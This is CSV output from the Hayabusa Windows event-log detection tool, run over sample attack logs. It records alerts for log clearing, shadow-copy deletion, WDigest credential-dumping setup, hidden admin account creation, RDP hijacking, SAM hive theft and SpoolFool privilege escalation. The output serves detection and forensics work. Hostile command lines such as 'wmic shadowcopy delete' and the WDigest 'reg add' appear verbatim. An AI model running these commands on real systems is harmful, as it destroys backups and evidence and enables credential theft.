2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx"
2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx
2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx
2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx
2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx
2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx
2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,rules/hayabusa/default/alerts/Security/4648_ExplicitLogonSuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx
2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx"
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx